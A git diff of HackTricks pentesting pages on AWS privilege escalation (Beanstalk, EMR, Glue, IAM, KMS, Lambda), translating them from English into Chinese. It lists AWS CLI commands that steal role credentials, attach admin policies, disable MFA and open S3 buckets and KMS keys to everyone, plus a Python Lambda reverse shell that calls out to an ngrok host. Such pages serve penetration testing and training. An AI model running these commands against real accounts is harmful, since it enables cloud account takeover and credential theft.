**victim can access it** (Note that this will **open** the Bucket to **EVERYONE**): - +一旦你有了 **自己的 Beanstalk 环境运行** 你的反向 shell,就该 **迁移** 到 **受害者** 环境了。为此,你需要 **更新你的 Beanstalk S3 存储桶的策略**,以便 **受害者可以访问它**(请注意,这将 **开放** 存储桶给 **所有人**): ```json { - "Version": "2008-10-17", - "Statement": [ - { - "Sid": "eb-af163bf3-d27b-4712-b795-d1e33e331ca4", - "Effect": "Allow", - "Principal": { - "AWS": "*" - }, - "Action": [ - "s3:ListBucket", - "s3:ListBucketVersions", - "s3:GetObject", - "s3:GetObjectVersion", - "s3:*" - ], - "Resource": [ - "arn:aws:s3:::elasticbeanstalk-us-east-1-947247140022", - "arn:aws:s3:::elasticbeanstalk-us-east-1-947247140022/*" - ] - }, - { - "Sid": "eb-58950a8c-feb6-11e2-89e0-0800277d041b", - "Effect": "Deny", - "Principal": { - "AWS": "*" - }, - "Action": "s3:DeleteBucket", - "Resource": "arn:aws:s3:::elasticbeanstalk-us-east-1-947247140022" - } - ] +"Version": "2008-10-17", +"Statement": [ +{ +"Sid": "eb-af163bf3-d27b-4712-b795-d1e33e331ca4", +"Effect": "Allow", +"Principal": { +"AWS": "*" +}, +"Action": [ +"s3:ListBucket", +"s3:ListBucketVersions", +"s3:GetObject", +"s3:GetObjectVersion", +"s3:*" +], +"Resource": [ +"arn:aws:s3:::elasticbeanstalk-us-east-1-947247140022", +"arn:aws:s3:::elasticbeanstalk-us-east-1-947247140022/*" +] +}, +{ +"Sid": "eb-58950a8c-feb6-11e2-89e0-0800277d041b", +"Effect": "Deny", +"Principal": { +"AWS": "*" +}, +"Action": "s3:DeleteBucket", +"Resource": "arn:aws:s3:::elasticbeanstalk-us-east-1-947247140022" +} +] } ``` @@ -181,9 +162,4 @@ Alternatively, [MaliciousBeanstalk](https://github.com/fr4nk3nst1ner/MaliciousBe The developer has intentions to establish a reverse shell using Netcat or Socat with next steps to keep exploitation contained to the ec2 instance to avoid detections. 
``` - {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-emr-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-emr-privesc.md index 0025abe52..c4e1a09f5 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-emr-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-emr-privesc.md @@ -4,7 +4,7 @@ ## EMR -More **info about EMR** in: +更多关于 **EMR** 的信息在: {{#ref}} ../aws-services/aws-emr-enum.md @@ -12,57 +12,51 @@ More **info about EMR** in: ### `iam:PassRole`, `elasticmapreduce:RunJobFlow` -An attacker with these permissions can **run a new EMR cluster attaching EC2 roles** and try to steal its credentials.\ -Note that in order to do this you would need to **know some ssh priv key imported in the account** or to import one, and be able to **open port 22 in the master node** (you might be able to do this with the attributes `EmrManagedMasterSecurityGroup` and/or `ServiceAccessSecurityGroup` inside `--ec2-attributes`). - +拥有这些权限的攻击者可以 **运行一个新的 EMR 集群并附加 EC2 角色**,并尝试窃取其凭证。\ +请注意,为了做到这一点,您需要 **知道在账户中导入的一些 ssh 私钥** 或导入一个,并能够 **在主节点上打开 22 端口**(您可能能够通过 `--ec2-attributes` 中的 `EmrManagedMasterSecurityGroup` 和/或 `ServiceAccessSecurityGroup` 属性来做到这一点)。 ```bash # Import EC2 ssh key (you will need extra permissions for this) ssh-keygen -b 2048 -t rsa -f /tmp/sshkey -q -N "" chmod 400 /tmp/sshkey base64 /tmp/sshkey.pub > /tmp/pub.key aws ec2 import-key-pair \ - --key-name "privesc" \ - --public-key-material file:///tmp/pub.key +--key-name "privesc" \ +--public-key-material file:///tmp/pub.key aws emr create-cluster \ - --release-label emr-5.15.0 \ - --instance-type m4.large \ - --instance-count 1 \ - --service-role EMR_DefaultRole \ - --ec2-attributes InstanceProfile=EMR_EC2_DefaultRole,KeyName=privesc +--release-label emr-5.15.0 \ +--instance-type m4.large \ +--instance-count 1 \ +--service-role EMR_DefaultRole \ +--ec2-attributes InstanceProfile=EMR_EC2_DefaultRole,KeyName=privesc # Wait 1min and connect via ssh to an EC2 instance of the cluster) aws emr describe-cluster --cluster-id # In MasterPublicDnsName you can find the DNS to connect to the master instance ## You cna also get this info listing EC2 instances ``` +注意如何在 `--service-role` 中指定 **EMR 角色**,以及在 `--ec2-attributes` 中指定 **ec2 角色**,位于 `InstanceProfile` 内。然而,这种技术仅允许窃取 EC2 角色凭证(因为您将通过 ssh 连接),而无法窃取 EMR IAM 角色。 -Note how an **EMR role** is specified in `--service-role` and a **ec2 role** is specified in `--ec2-attributes` inside `InstanceProfile`. However, this technique only allows to steal the EC2 role credentials (as you will connect via ssh) but no the EMR IAM Role. - -**Potential Impact:** Privesc to the EC2 service role specified. +**潜在影响:** 提升到指定的 EC2 服务角色。 ### `elasticmapreduce:CreateEditor`, `iam:ListRoles`, `elasticmapreduce:ListClusters`, `iam:PassRole`, `elasticmapreduce:DescribeEditor`, `elasticmapreduce:OpenEditorInConsole` -With these permissions an attacker can go to the **AWS console**, create a Notebook and access it to steal the IAM Role. +拥有这些权限的攻击者可以进入 **AWS 控制台**,创建一个 Notebook 并访问它以窃取 IAM 角色。 > [!CAUTION] -> Even if you attach an IAM role to the notebook instance in my tests I noticed that I was able to steal AWS managed credentials and not creds related to the IAM role related. 
+> 即使您在我的测试中将 IAM 角色附加到 Notebook 实例,我注意到我能够窃取 AWS 管理的凭证,而不是与 IAM 角色相关的凭证。 -**Potential Impact:** Privesc to AWS managed role arn:aws:iam::420254708011:instance-profile/prod-EditorInstanceProfile +**潜在影响:** 提升到 AWS 管理角色 arn:aws:iam::420254708011:instance-profile/prod-EditorInstanceProfile ### `elasticmapreduce:OpenEditorInConsole` -Just with this permission an attacker will be able to access the **Jupyter Notebook and steal the IAM role** associated to it.\ -The URL of the notebook is `https://.emrnotebooks-prod.eu-west-1.amazonaws.com//lab/` +仅凭此权限,攻击者将能够访问 **Jupyter Notebook 并窃取与之关联的 IAM 角色**。\ +Notebook 的 URL 是 `https://.emrnotebooks-prod.eu-west-1.amazonaws.com//lab/` > [!CAUTION] -> Even if you attach an IAM role to the notebook instance in my tests I noticed that I was able to steal AWS managed credentials and not creds related to the IAM role related +> 即使您在我的测试中将 IAM 角色附加到 Notebook 实例,我注意到我能够窃取 AWS 管理的凭证,而不是与 IAM 角色相关的凭证。 -**Potential Impact:** Privesc to AWS managed role arn:aws:iam::420254708011:instance-profile/prod-EditorInstanceProfile +**潜在影响:** 提升到 AWS 管理角色 arn:aws:iam::420254708011:instance-profile/prod-EditorInstanceProfile {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-gamelift.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-gamelift.md index b40cdf413..b3ffb541f 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-gamelift.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-gamelift.md @@ -4,19 +4,13 @@ ### `gamelift:RequestUploadCredentials` -With this permission an attacker can retrieve a **fresh set of credentials for use when uploading** a new set of game build files to Amazon GameLift's Amazon S3. It'll return **S3 upload credentials**. - +通过此权限,攻击者可以检索一组**用于上传**新游戏构建文件到Amazon GameLift的Amazon S3的**新凭证**。它将返回**S3上传凭证**。 ```bash aws gamelift request-upload-credentials \ - --build-id build-a1b2c3d4-5678-90ab-cdef-EXAMPLE11111 +--build-id build-a1b2c3d4-5678-90ab-cdef-EXAMPLE11111 ``` - -## References +## 参考 - [https://gist.github.com/kmcquade/33860a617e651104d243c324ddf7992a](https://gist.github.com/kmcquade/33860a617e651104d243c324ddf7992a) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-glue-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-glue-privesc.md index 049d3b273..1632ab54b 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-glue-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-glue-privesc.md @@ -6,15 +6,14 @@ ### `iam:PassRole`, `glue:CreateDevEndpoint`, (`glue:GetDevEndpoint` | `glue:GetDevEndpoints`) -Users with these permissions can **set up a new AWS Glue development endpoint**, **assigning an existing service role assumable by Glue** with specific permissions to this endpoint. 
-
-After the setup, the **attacker can SSH into the endpoint's instance**, and steal the IAM credentials of the assigned role:
+拥有这些权限的用户可以**设置一个新的 AWS Glue 开发端点**,**将一个现有的服务角色分配给 Glue**,并为该端点指定特定权限。
+设置完成后,**攻击者可以通过 SSH 进入端点的实例**,并窃取分配角色的 IAM 凭证:
```bash
# Create endpoint
aws glue create-dev-endpoint --endpoint-name \
--role-arn \
--public-key file:///ssh/key.pub

# Get the public address of the instance
## You could also use get-dev-endpoints
aws glue get-dev-endpoint --endpoint-name privesctest

# SSH with the glue user
ssh -i /tmp/private.key ec2-54-72-118-58.eu-west-1.compute.amazonaws.com
```
+为了隐蔽目的,建议使用来自 Glue 虚拟机的 IAM 凭证。
-For stealth purpose, it's recommended to use the IAM credentials from inside the Glue virtual machine.

-**Potential Impact:** Privesc to the glue service role specified.
+**潜在影响:** 提升到指定的 Glue 服务角色。

### `glue:UpdateDevEndpoint`, (`glue:GetDevEndpoint` | `glue:GetDevEndpoints`)

-Users with this permission can **alter an existing Glue development** endpoint's SSH key, **enabling SSH access to it**. This allows the attacker to execute commands with the privileges of the endpoint's attached role:
+拥有此权限的用户可以**更改现有 Glue 开发**端点的 SSH 密钥,**从而启用对其的 SSH 访问**。这允许攻击者以端点附加角色的权限执行命令:
```bash
# Change public key to connect
aws glue update-dev-endpoint --endpoint-name target_endpoint \
--public-key file:///ssh/key.pub

# Get the public address of the instance
## You could also use get-dev-endpoints
aws glue get-dev-endpoint --endpoint-name privesctest

# SSH with the glue user
ssh -i /tmp/private.key ec2-54-72-118-58.eu-west-1.compute.amazonaws.com
```
-**Potential Impact:** Privesc to the glue service role used.
+**潜在影响:** 提升到所使用的 Glue 服务角色。

### `iam:PassRole`, (`glue:CreateJob` | `glue:UpdateJob`), (`glue:StartJobRun` | `glue:CreateTrigger`)

-Users with **`iam:PassRole`** combined with either **`glue:CreateJob` or `glue:UpdateJob`**, and either **`glue:StartJobRun` or `glue:CreateTrigger`** can **create or update an AWS Glue job**, attaching any **Glue service account**, and initiate the job's execution. The job's capabilities include running arbitrary Python code, which can be exploited to establish a reverse shell.
This reverse shell can then be utilized to exfiltrate the **IAM credential**s of the role attached to the Glue job, leading to potential unauthorized access or actions based on the permissions of that role: - +具有 **`iam:PassRole`** 权限的用户,结合 **`glue:CreateJob` 或 `glue:UpdateJob`**,以及 **`glue:StartJobRun` 或 `glue:CreateTrigger`**,可以 **创建或更新 AWS Glue 作业**,附加任何 **Glue 服务账户**,并启动作业的执行。该作业的功能包括运行任意 Python 代码,这可以被利用来建立反向 shell。然后可以利用这个反向 shell 来提取附加到 Glue 作业的 **IAM 凭证**,从而导致基于该角色权限的潜在未授权访问或操作: ```bash # Content of the python script saved in s3: #import socket,subprocess,os @@ -65,32 +60,27 @@ Users with **`iam:PassRole`** combined with either **`glue:CreateJob` or `glue:U # A Glue role with admin access was created aws glue create-job \ - --name privesctest \ - --role arn:aws:iam::93424712358:role/GlueAdmin \ - --command '{"Name":"pythonshell", "PythonVersion": "3", "ScriptLocation":"s3://airflow2123/rev.py"}' +--name privesctest \ +--role arn:aws:iam::93424712358:role/GlueAdmin \ +--command '{"Name":"pythonshell", "PythonVersion": "3", "ScriptLocation":"s3://airflow2123/rev.py"}' # You can directly start the job aws glue start-job-run --job-name privesctest # Or you can create a trigger to start it aws glue create-trigger --name triggerprivesc --type SCHEDULED \ - --actions '[{"JobName": "privesctest"}]' --start-on-creation \ - --schedule "0/5 * * * * *" #Every 5mins, feel free to change +--actions '[{"JobName": "privesctest"}]' --start-on-creation \ +--schedule "0/5 * * * * *" #Every 5mins, feel free to change ``` - -**Potential Impact:** Privesc to the glue service role specified. +**潜在影响:** 提升到指定的 glue 服务角色。 ### `glue:UpdateJob` -Just with the update permission an attacked could steal the IAM Credentials of the already attached role. +仅凭更新权限,攻击者可以窃取已附加角色的 IAM 凭证。 -**Potential Impact:** Privesc to the glue service role attached. +**潜在影响:** 提升到附加的 glue 服务角色。 -## References +## 参考文献 - [https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/](https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.md index 7807f6152..10bcb77af 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.md @@ -4,7 +4,7 @@ ## IAM -For more info about IAM check: +有关 IAM 的更多信息,请查看: {{#ref}} ../aws-services/aws-iam-enum.md @@ -12,228 +12,189 @@ For more info about IAM check: ### **`iam:CreatePolicyVersion`** -Grants the ability to create a new IAM policy version, bypassing the need for `iam:SetDefaultPolicyVersion` permission by using the `--set-as-default` flag. This enables defining custom permissions. +授予创建新的 IAM 策略版本的能力,通过使用 `--set-as-default` 标志绕过对 `iam:SetDefaultPolicyVersion` 权限的需求。这使得定义自定义权限成为可能。 **Exploit Command:** - ```bash aws iam create-policy-version --policy-arn \ - --policy-document file:///path/to/administrator/policy.json --set-as-default +--policy-document file:///path/to/administrator/policy.json --set-as-default ``` - -**Impact:** Directly escalates privileges by allowing any action on any resource. 
+**影响:** 通过允许对任何资源执行任何操作,直接提升权限。 ### **`iam:SetDefaultPolicyVersion`** -Allows changing the default version of an IAM policy to another existing version, potentially escalating privileges if the new version has more permissions. - -**Bash Command:** +允许将 IAM 策略的默认版本更改为另一个现有版本,如果新版本具有更多权限,则可能提升权限。 +**Bash 命令:** ```bash aws iam set-default-policy-version --policy-arn --version-id v2 ``` - -**Impact:** Indirect privilege escalation by enabling more permissions. +**影响:** 通过启用更多权限进行间接权限提升。 ### **`iam:CreateAccessKey`** -Enables creating access key ID and secret access key for another user, leading to potential privilege escalation. - -**Exploit:** +允许为另一个用户创建访问密钥 ID 和秘密访问密钥,从而导致潜在的权限提升。 +**利用:** ```bash aws iam create-access-key --user-name ``` - -**Impact:** Direct privilege escalation by assuming another user's extended permissions. +**影响:** 通过假设其他用户的扩展权限进行直接权限提升。 ### **`iam:CreateLoginProfile` | `iam:UpdateLoginProfile`** -Permits creating or updating a login profile, including setting passwords for AWS console login, leading to direct privilege escalation. - -**Exploit for Creation:** +允许创建或更新登录配置文件,包括设置AWS控制台登录的密码,从而导致直接权限提升。 +**创建利用:** ```bash aws iam create-login-profile --user-name target_user --no-password-reset-required \ - --password '' +--password '' ``` - -**Exploit for Update:** - +**利用更新:** ```bash aws iam update-login-profile --user-name target_user --no-password-reset-required \ - --password '' +--password '' ``` - -**Impact:** Direct privilege escalation by logging in as "any" user. +**影响:** 通过以“任何”用户身份登录直接提升权限。 ### **`iam:UpdateAccessKey`** -Allows enabling a disabled access key, potentially leading to unauthorized access if the attacker possesses the disabled key. - -**Exploit:** +允许启用已禁用的访问密钥,如果攻击者拥有已禁用的密钥,可能导致未经授权的访问。 +**利用:** ```bash aws iam update-access-key --access-key-id --status Active --user-name ``` - -**Impact:** Direct privilege escalation by reactivating access keys. +**影响:** 通过重新激活访问密钥直接提升权限。 ### **`iam:CreateServiceSpecificCredential` | `iam:ResetServiceSpecificCredential`** -Enables generating or resetting credentials for specific AWS services (e.g., CodeCommit, Amazon Keyspaces), inheriting the permissions of the associated user. - -**Exploit for Creation:** +允许为特定的AWS服务(例如,CodeCommit,Amazon Keyspaces)生成或重置凭证,继承相关用户的权限。 +**创建利用:** ```bash aws iam create-service-specific-credential --user-name --service-name ``` - -**Exploit for Reset:** - +**重置利用:** ```bash aws iam reset-service-specific-credential --service-specific-credential-id ``` - -**Impact:** Direct privilege escalation within the user's service permissions. +**影响:** 在用户的服务权限中直接提升特权。 ### **`iam:AttachUserPolicy` || `iam:AttachGroupPolicy`** -Allows attaching policies to users or groups, directly escalating privileges by inheriting the permissions of the attached policy. - -**Exploit for User:** +允许将策略附加到用户或组,通过继承附加策略的权限直接提升特权。 +**用户利用:** ```bash aws iam attach-user-policy --user-name --policy-arn "" ``` - -**Exploit for Group:** - +**针对组的利用:** ```bash aws iam attach-group-policy --group-name --policy-arn "" ``` - -**Impact:** Direct privilege escalation to anything the policy grants. +**影响:** 直接提升到策略所授予的任何权限。 ### **`iam:AttachRolePolicy`,** ( `sts:AssumeRole`|`iam:createrole`) | **`iam:PutUserPolicy` | `iam:PutGroupPolicy` | `iam:PutRolePolicy`** -Permits attaching or putting policies to roles, users, or groups, enabling direct privilege escalation by granting additional permissions. 
- -**Exploit for Role:** +允许将策略附加或放置到角色、用户或组,从而通过授予额外权限实现直接的权限提升。 +**角色利用:** ```bash aws iam attach-role-policy --role-name --policy-arn "" ``` - -**Exploit for Inline Policies:** - +**利用内联策略:** ```bash aws iam put-user-policy --user-name --policy-name "" \ - --policy-document "file:///path/to/policy.json" +--policy-document "file:///path/to/policy.json" aws iam put-group-policy --group-name --policy-name "" \ - --policy-document file:///path/to/policy.json +--policy-document file:///path/to/policy.json aws iam put-role-policy --role-name --policy-name "" \ - --policy-document file:///path/to/policy.json +--policy-document file:///path/to/policy.json ``` - -You can use a policy like: - +您可以使用如下策略: ```json { - "Version": "2012-10-17", - "Statement": [ - { - "Effect": "Allow", - "Action": ["*"], - "Resource": ["*"] - } - ] +"Version": "2012-10-17", +"Statement": [ +{ +"Effect": "Allow", +"Action": ["*"], +"Resource": ["*"] +} +] } ``` - -**Impact:** Direct privilege escalation by adding permissions through policies. +**影响:** 通过策略添加权限直接提升权限。 ### **`iam:AddUserToGroup`** -Enables adding oneself to an IAM group, escalating privileges by inheriting the group's permissions. - -**Exploit:** +允许将自己添加到 IAM 组中,通过继承该组的权限来提升权限。 +**利用:** ```bash aws iam add-user-to-group --group-name --user-name ``` - -**Impact:** Direct privilege escalation to the level of the group's permissions. +**影响:** 直接提升到组权限的级别。 ### **`iam:UpdateAssumeRolePolicy`** -Allows altering the assume role policy document of a role, enabling the assumption of the role and its associated permissions. - -**Exploit:** +允许更改角色的假设角色策略文档,从而启用角色及其相关权限的假设。 +**利用:** ```bash aws iam update-assume-role-policy --role-name \ - --policy-document file:///path/to/assume/role/policy.json +--policy-document file:///path/to/assume/role/policy.json ``` - -Where the policy looks like the following, which gives the user permission to assume the role: - +当策略看起来如下所示时,它授予用户假设角色的权限: ```json { - "Version": "2012-10-17", - "Statement": [ - { - "Effect": "Allow", - "Action": "sts:AssumeRole", - "Principal": { - "AWS": "$USER_ARN" - } - } - ] +"Version": "2012-10-17", +"Statement": [ +{ +"Effect": "Allow", +"Action": "sts:AssumeRole", +"Principal": { +"AWS": "$USER_ARN" +} +} +] } ``` - -**Impact:** Direct privilege escalation by assuming any role's permissions. +**影响:** 通过假设任何角色的权限进行直接权限提升。 ### **`iam:UploadSSHPublicKey` || `iam:DeactivateMFADevice`** -Permits uploading an SSH public key for authenticating to CodeCommit and deactivating MFA devices, leading to potential indirect privilege escalation. - -**Exploit for SSH Key Upload:** +允许上传用于身份验证到 CodeCommit 的 SSH 公钥和停用 MFA 设备,从而导致潜在的间接权限提升。 +**SSH 密钥上传的利用:** ```bash aws iam upload-ssh-public-key --user-name --ssh-public-key-body ``` - -**Exploit for MFA Deactivation:** - +**利用MFA停用:** ```bash aws iam deactivate-mfa-device --user-name --serial-number ``` - -**Impact:** Indirect privilege escalation by enabling CodeCommit access or disabling MFA protection. +**影响:** 通过启用 CodeCommit 访问或禁用 MFA 保护进行间接权限提升。 ### **`iam:ResyncMFADevice`** -Allows resynchronization of an MFA device, potentially leading to indirect privilege escalation by manipulating MFA protection. - -**Bash Command:** +允许重新同步 MFA 设备,可能通过操纵 MFA 保护导致间接权限提升。 +**Bash 命令:** ```bash aws iam resync-mfa-device --user-name --serial-number \ - --authentication-code1 --authentication-code2 +--authentication-code1 --authentication-code2 ``` - -**Impact:** Indirect privilege escalation by adding or manipulating MFA devices. 
+**影响:** 通过添加或操纵 MFA 设备进行间接权限提升。 ### `iam:UpdateSAMLProvider`, `iam:ListSAMLProviders`, (`iam:GetSAMLProvider`) -With these permissions you can **change the XML metadata of the SAML connection**. Then, you could abuse the **SAML federation** to **login** with any **role that is trusting** it. - -Note that doing this **legit users won't be able to login**. However, you could get the XML, so you can put yours, login and configure the previous back +拥有这些权限后,您可以**更改 SAML 连接的 XML 元数据**。然后,您可以利用**SAML 联邦**以**任何信任它的角色登录**。 +请注意,执行此操作后**合法用户将无法登录**。但是,您可以获取 XML,因此您可以放入自己的,登录并配置之前的设置。 ```bash # List SAMLs aws iam list-saml-providers @@ -249,14 +210,12 @@ aws iam update-saml-provider --saml-metadata-document --saml-provider-ar # Optional: Set the previous XML back aws iam update-saml-provider --saml-metadata-document --saml-provider-arn ``` - > [!NOTE] -> TODO: A Tool capable of generating the SAML metadata and login with a specified role +> TODO: 一个能够生成 SAML 元数据并使用指定角色登录的工具 ### `iam:UpdateOpenIDConnectProviderThumbprint`, `iam:ListOpenIDConnectProviders`, (`iam:`**`GetOpenIDConnectProvider`**) -(Unsure about this) If an attacker has these **permissions** he could add a new **Thumbprint** to manage to login in all the roles trusting the provider. - +(不确定)如果攻击者拥有这些 **权限**,他可以添加一个新的 **Thumbprint** 来管理所有信任该提供者的角色的登录。 ```bash # List providers aws iam list-open-id-connect-providers @@ -265,13 +224,8 @@ aws iam get-open-id-connect-provider --open-id-connect-provider-arn # Update Thumbprints (The thumbprint is always a 40-character string) aws iam update-open-id-connect-provider-thumbprint --open-id-connect-provider-arn --thumbprint-list 359755EXAMPLEabc3060bce3EXAMPLEec4542a3 ``` - -## References +## 参考文献 - [https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/](https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-kms-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-kms-privesc.md index 02c05b76d..b954a79f1 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-kms-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-kms-privesc.md @@ -4,7 +4,7 @@ ## KMS -For more info about KMS check: +有关 KMS 的更多信息,请查看: {{#ref}} ../aws-services/aws-kms-enum.md @@ -12,8 +12,7 @@ For more info about KMS check: ### `kms:ListKeys`,`kms:PutKeyPolicy`, (`kms:ListKeyPolicies`, `kms:GetKeyPolicy`) -With these permissions it's possible to **modify the access permissions to the key** so it can be used by other accounts or even anyone: - +拥有这些权限后,可以**修改密钥的访问权限**,使其可以被其他账户甚至任何人使用: ```bash aws kms list-keys aws kms list-key-policies --key-id # Although only 1 max per key @@ -21,106 +20,91 @@ aws kms get-key-policy --key-id --policy-name # AWS KMS keys can only have 1 policy, so you need to use the same name to overwrite the policy (the name is usually "default") aws kms put-key-policy --key-id --policy-name --policy file:///tmp/policy.json ``` - policy.json: - ```json { - "Version": "2012-10-17", - "Id": "key-consolepolicy-3", - "Statement": [ - { - "Sid": "Enable IAM User Permissions", - "Effect": "Allow", - "Principal": { - "AWS": "arn:aws:iam:::root" - }, - "Action": "kms:*", - "Resource": "*" - }, - { - "Sid": "Allow all use", - "Effect": "Allow", - "Principal": { - "AWS": "arn:aws:iam:::root" - }, - "Action": ["kms:*"], - "Resource": "*" - } - ] +"Version": 
"2012-10-17", +"Id": "key-consolepolicy-3", +"Statement": [ +{ +"Sid": "Enable IAM User Permissions", +"Effect": "Allow", +"Principal": { +"AWS": "arn:aws:iam:::root" +}, +"Action": "kms:*", +"Resource": "*" +}, +{ +"Sid": "Allow all use", +"Effect": "Allow", +"Principal": { +"AWS": "arn:aws:iam:::root" +}, +"Action": ["kms:*"], +"Resource": "*" +} +] } ``` - ### `kms:CreateGrant` -It **allows a principal to use a KMS key:** - +它**允许主体使用 KMS 密钥:** ```bash aws kms create-grant \ - --key-id 1234abcd-12ab-34cd-56ef-1234567890ab \ - --grantee-principal arn:aws:iam::123456789012:user/exampleUser \ - --operations Decrypt +--key-id 1234abcd-12ab-34cd-56ef-1234567890ab \ +--grantee-principal arn:aws:iam::123456789012:user/exampleUser \ +--operations Decrypt ``` +> [!WARNING] +> 授权只能允许某些类型的操作: [https://docs.aws.amazon.com/kms/latest/developerguide/grants.html#terms-grant-operations](https://docs.aws.amazon.com/kms/latest/developerguide/grants.html#terms-grant-operations) > [!WARNING] -> A grant can only allow certain types of operations: [https://docs.aws.amazon.com/kms/latest/developerguide/grants.html#terms-grant-operations](https://docs.aws.amazon.com/kms/latest/developerguide/grants.html#terms-grant-operations) - -> [!WARNING] -> Note that it might take a couple of minutes for KMS to **allow the user to use the key after the grant has been generated**. Once that time has passed, the principal can use the KMS key without needing to specify anything.\ -> However, if it's needed to use the grant right away [use a grant token](https://docs.aws.amazon.com/kms/latest/developerguide/grant-manage.html#using-grant-token) (check the following code).\ -> For [**more info read this**](https://docs.aws.amazon.com/kms/latest/developerguide/grant-manage.html#using-grant-token). - +> 请注意,KMS 可能需要几分钟才能 **在生成授权后允许用户使用密钥**。一旦时间过去,主体可以在不需要指定任何内容的情况下使用 KMS 密钥。\ +> 然而,如果需要立即使用授权 [请使用授权令牌](https://docs.aws.amazon.com/kms/latest/developerguide/grant-manage.html#using-grant-token)(查看以下代码)。\ +> 有关 [**更多信息,请阅读此内容**](https://docs.aws.amazon.com/kms/latest/developerguide/grant-manage.html#using-grant-token)。 ```bash # Use the grant token in a request aws kms generate-data-key \ - --key-id 1234abcd-12ab-34cd-56ef-1234567890ab \ - –-key-spec AES_256 \ - --grant-tokens $token +--key-id 1234abcd-12ab-34cd-56ef-1234567890ab \ +–-key-spec AES_256 \ +--grant-tokens $token ``` - -Note that it's possible to list grant of keys with: - +注意,可以使用以下命令列出密钥的授权: ```bash aws kms list-grants --key-id ``` - ### `kms:CreateKey`, `kms:ReplicateKey` -With these permissions it's possible to replicate a multi-region enabled KMS key in a different region with a different policy. 
- -So, an attacker could abuse this to obtain privesc his access to the key and use it +通过这些权限,可以在不同区域以不同策略复制启用多区域的 KMS 密钥。 +因此,攻击者可以利用这一点来获取对密钥的权限提升并使用它。 ```bash aws kms replicate-key --key-id mrk-c10357313a644d69b4b28b88523ef20c --replica-region eu-west-3 --bypass-policy-lockout-safety-check --policy file:///tmp/policy.yml { - "Version": "2012-10-17", - "Id": "key-consolepolicy-3", - "Statement": [ - { - "Sid": "Enable IAM User Permissions", - "Effect": "Allow", - "Principal": { - "AWS": "*" - }, - "Action": "kms:*", - "Resource": "*" - } - ] +"Version": "2012-10-17", +"Id": "key-consolepolicy-3", +"Statement": [ +{ +"Sid": "Enable IAM User Permissions", +"Effect": "Allow", +"Principal": { +"AWS": "*" +}, +"Action": "kms:*", +"Resource": "*" +} +] } ``` - ### `kms:Decrypt` -This permission allows to use a key to decrypt some information.\ -For more information check: +此权限允许使用密钥解密某些信息。\ +有关更多信息,请查看: {{#ref}} ../aws-post-exploitation/aws-kms-post-exploitation.md {{#endref}} {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-lambda-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-lambda-privesc.md index d276ef737..c0f2c0d9d 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-lambda-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-lambda-privesc.md @@ -4,7 +4,7 @@ ## lambda -More info about lambda in: +有关 lambda 的更多信息: {{#ref}} ../aws-services/aws-lambda-enum.md @@ -12,23 +12,22 @@ More info about lambda in: ### `iam:PassRole`, `lambda:CreateFunction`, (`lambda:InvokeFunction` | `lambda:InvokeFunctionUrl`) -Users with the **`iam:PassRole`, `lambda:CreateFunction`, and `lambda:InvokeFunction`** permissions can escalate their privileges.\ -They can **create a new Lambda function and assign it an existing IAM role**, granting the function the permissions associated with that role. The user can then **write and upload code to this Lambda function (with a rev shell for example)**.\ -Once the function is set up, the user can **trigger its execution** and the intended actions by invoking the Lambda function through the AWS API. 
This approach effectively allows the user to perform tasks indirectly through the Lambda function, operating with the level of access granted to the IAM role associated with it.\\ - -A attacker could abuse this to get a **rev shell and steal the token**: +拥有 **`iam:PassRole`, `lambda:CreateFunction` 和 `lambda:InvokeFunction`** 权限的用户可以提升他们的权限。\ +他们可以 **创建一个新的 Lambda 函数并为其分配一个现有的 IAM 角色**,从而授予该函数与该角色相关联的权限。然后,用户可以 **向此 Lambda 函数编写和上传代码(例如带有 rev shell 的代码)**。\ +一旦函数设置完成,用户可以 **通过 AWS API 触发其执行** 和预期的操作。这种方法有效地允许用户通过 Lambda 函数间接执行任务,操作时使用与其关联的 IAM 角色授予的访问级别。\\ +攻击者可以利用这一点获取 **rev shell 并窃取令牌**: ```python:rev.py import socket,subprocess,os,time def lambda_handler(event, context): - s = socket.socket(socket.AF_INET,socket.SOCK_STREAM); - s.connect(('4.tcp.ngrok.io',14305)) - os.dup2(s.fileno(),0) - os.dup2(s.fileno(),1) - os.dup2(s.fileno(),2) - p=subprocess.call(['/bin/sh','-i']) - time.sleep(900) - return 0 +s = socket.socket(socket.AF_INET,socket.SOCK_STREAM); 